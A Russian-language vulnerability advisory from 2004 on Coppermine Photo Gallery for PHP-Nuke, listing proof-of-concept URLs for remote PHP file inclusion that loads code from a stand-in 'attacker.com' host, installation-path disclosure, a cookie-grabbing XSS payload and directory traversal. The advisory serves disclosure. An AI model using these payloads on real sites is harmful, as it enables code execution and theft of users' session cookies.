Несколько уязвимостей в Coppermine Photo Gallery
| Дата публикации: | 02.05.2004 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 7120 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Coppermine Photo Gallery Module for phpNuke/postNuke 1.x |
| Уязвимые версии: Coppermine Photo Gallery 1.2.2b, 1.2.0 RC4
Описание: Несколько уязвимостей обнаружено в Coppermine Photo Gallery. Удаленный пользователь может выполнить произвольный PHP код на целевой системе, выполнить XSS нападение и определить инсталляционный путь. 1 PHP including: http://localhost/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://at tacker.com http://localhost/nuke72/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.com http://localhost/nuke72/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://attacker.com http://localhost/nuke72/modules/coppermine/themes/ma ze/theme.php?THEME_DIR=http://attacker.com2. Раскрытие инсталляционного пути: http://localhost/nuke72/modules/coppermine/phpinfo.php http://localhost/nuke72/modules/coppermine/addpic.php ht tp://localhost/nuke72/modules/coppermine/config.php http://localhost/nuke72/modules/coppermine/db_input.php http://localhost/nuke72/modules/coppermine/displayecard.php http://localhost/nuke72/modules/coppermine/ecard.php http://localhost/nuke72/modules/coppermine/include/crop.inc.php3. XSS: http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=fo obar">[xss code here] http://localhost/nuke72/modules/coppermine/docs/menu.inc.php?CPG_URL=foobar"><body%20onload=alert(document.cookie);>4. Просмотр структуры каталогов (удаленный авторизованный пользователь с PHP-Nuke административными привилегиями): http://localhost/nuke72/modules.php?name=coppermine&file=searchnew&startdir=../..Также сообщается, что удаленный авторизованный пользователь с административными привилегиями PHP-Nuke может выполнить произвольные команды оболочки, представляя специально обработанные 'impath' и 'jpeg_qual' параметры конфигурации. Пример см. в источнике сообщения. URL производителя:http://coppermine.sourceforge.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | [Full-Disclosure] [waraxe-2004-SA#026 - Multiple vulnerabilities in Coppermine Photo Gallery for PhpNuke] |